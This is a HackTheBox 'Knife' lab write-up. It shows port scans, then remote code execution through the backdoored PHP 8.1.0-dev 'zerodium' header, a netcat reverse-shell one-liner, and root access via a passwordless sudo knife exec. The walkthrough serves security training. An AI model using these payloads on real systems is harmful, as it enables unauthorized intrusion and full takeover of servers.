Content
Welcome to the Knife writeup from HTB
tags:
Enumeration
Nmap
Port 80
Exploitation
Backdoor
Exploitation
Post exploitation
Enumeration
Sudo
Privilege escalation
Nmap
Port 80
Exploitation
Backdoor
Exploitation
Post exploitation
Enumeration
Sudo
Privilege escalation
Welcome to the Knife writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Knife
tags: HTB Easy Linux
Platform: Hackthebox
Difficult: Easy
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
kali@kali:~/Documents/HTB/Knife$ sudo nmap -sS -n -T5 -p- -oN AllPorts.txt 10.129.109.121
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-22 16:08 EDT
Warning: 10.129.109.121 giving up on port because retransmission cap hit (2).
Stats: 0:01:51 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 74.60% done; ETC: 16:11 (0:00:38 remaining)
Nmap scan report for 10.129.109.121
Host is up (0.11s latency).
Not shown: 65468 closed ports, 65 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 150.09 secondsNow that we know the open ports, let's scan them in depth.
kali@kali:~/Documents/HTB/Knife$ sudo nmap -sC -sV -p22,80 -oN PortsDepth.txt 10.129.109.121
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-22 16:20 EDT
Nmap scan report for 10.129.109.121
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.35 secondsPort 80
Well, looking the X-Powered-By in the website response header we can know that is using the PHP 8.1.0-dev version. Searching on internet about it, we can find a backdoor.
In this link we can view a PoC.
And here is the Backdoor source.
Exploitation
Backdoor
Using the User-Agentt: zerodiumvar_dump(3*3); payload on BURP Suite we can get RCE.
GET / HTTP/1.1
Host: knife.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
User-Agentt: zerodiumvar_dump(3*3);
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: HTTP/1.1 200 OK
Date: Sat, 22 May 2021 22:00:46 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5825
Connection: close
Content-Type: text/html; charset=UTF-8
int(9)
<!DOCTYPE html>Ok, now we can run system commands using the system() PHP function.
GET / HTTP/1.1
Host: knife.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
User-Agentt: zerodiumvar_dump(system("id"));
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1HTTP/1.1 200 OK
Date: Sat, 22 May 2021 22:09:43 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5930
Connection: close
Content-Type: text/html; charset=UTF-8
uid=1000(james) gid=1000(james) groups=1000(james)
string(50) "uid=1000(james) gid=1000(james) groups=1000(james)"
<!DOCTYPE html>Exploitation
Knowing it, we can get a shell setting a listening terminal and sending this payload.
User-Agentt: zerodiumvar_dump(system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.15 8787 >/tmp/f"));Now we can get the user flag.
james@knife:~$ cat user.txt
CENSORED_FLAGPost exploitation
Enumeration
Sudo
As we can see, we can execute knife as root without password.
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knifePrivilege escalation
The knife file is running in ruby. We can use the -s flag to execute our custom script to get root.
james@knife:~$ sudo knife exec -s http://10.10.14.15
An interactive shell is opened
Type your script and do:
1. To run the script, use 'Ctrl D'
2. To exit, use 'Ctrl/Shift C'
Type here a script...
system("/bin/bash")
root@knife:/home/james# id
uid=0(root) gid=0(root) groups=0(root)
root@knife:/home/james# cat /root/root.txt
CENSORED_FLAGAnd that's all folks.
Can you help me share it?
